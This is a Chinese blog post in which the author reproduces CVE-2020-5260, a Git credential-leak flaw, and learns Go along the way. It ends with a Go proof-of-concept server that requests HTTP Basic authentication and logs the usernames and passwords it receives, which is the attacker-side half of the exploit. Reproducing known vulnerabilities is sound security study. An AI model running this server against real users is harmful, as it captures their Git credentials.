前言
現在是凌晨三點了,我習慣性的打開QQ去看羣裏大佬門們的聊天記錄,之後的一條來自GitHub監控機器人的一條推送讓我選擇了起牀!
先給大家來介紹點背景知識,昨天的綠盟科技安全情報推了一條關於Git的憑證泄露漏洞的通告.
緣由
詳細信息請看Git的憑證泄露漏洞
一般這種情況都是坐等大佬放poc,我在今天凌晨三點終於等到了大佬復現成功的消息,請看動圖:
詳情請移步
到了這裏我一直都還挺激動的.終於可以復現1day了,可是卻發現,這poc是用go語言寫的,於是就有了這篇博客,讓我把go納入我編程技能樹,poc代碼見文末.
HelloWorld.go
以下是毫無技術可言的安裝過程和環境測試:
CVE-2020-5260
附上CVE-2020-5260的POC
poc1:
package main
import (
"log"
"net/http"
)
func h(w http.ResponseWriter, r *http.Request) {
username, password, ok := r.BasicAuth()
if ok {
log.Printf("user: %v password: %v\n", username, password)
w.WriteHeader(200)
return
}
w.Header().Set("WWW-Authenticate", `Basic realm="foo"`)
http.Error(w, "Not authorized", 401)
return
}
func main() {
http.HandleFunc("/", h)
err := http.ListenAndServe(":8088", nil)
if err != nil {
log.Fatal("ListenAndServe: ", err)
}
}
結語
通過這件事兒,讓我想起了高中母校的校訓:任重道遠,同時也讓我覺得做技術,就得要隨時做好接收一門新技術的準備,爲自己的技能樹添枝加葉,日後方能枝繁葉茂,予人蔭涼!